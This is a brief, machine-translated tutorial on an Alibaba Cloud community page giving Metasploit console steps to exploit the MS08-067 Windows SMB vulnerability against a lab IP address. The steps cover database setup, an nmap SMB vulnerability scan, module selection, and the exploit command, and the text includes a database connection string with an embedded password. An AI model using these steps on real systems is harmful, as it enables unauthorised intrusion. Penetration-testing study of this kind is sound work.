Simple Metasploit Vulnerability Intrusion step

Source: Internet
Author: User
Tags postgresql
1, service PostgreSQL start open the database service
2, service Metasploit start Metasploit Services
3. UPDATE-RC.D PostgreSQL Enable update Service
4. UPDATE-RC.D Metasploit Enable
5, UPDATE-RC.D ssh enable to update its own port services
6, Msfconsole
7, Db_status View the database
Link Database Db_connect msf3:vfe90zusg1wfufkybawxotfatbsmcjvc@127.0.0.1/msf3
View Password Vi/opt/metasploit/properties.ini
Scan Port Db_nmap-ss-sv-o--script=smb-check-vulns.nse-n 192.168.230.145
8, use the loophole using EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI
9, Show options need what configuration
10, set Rhost 192.168.230.145 sets the other IP
11, set target 41 setting targets system
12, exploit attack


Notes.....

Conficker

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.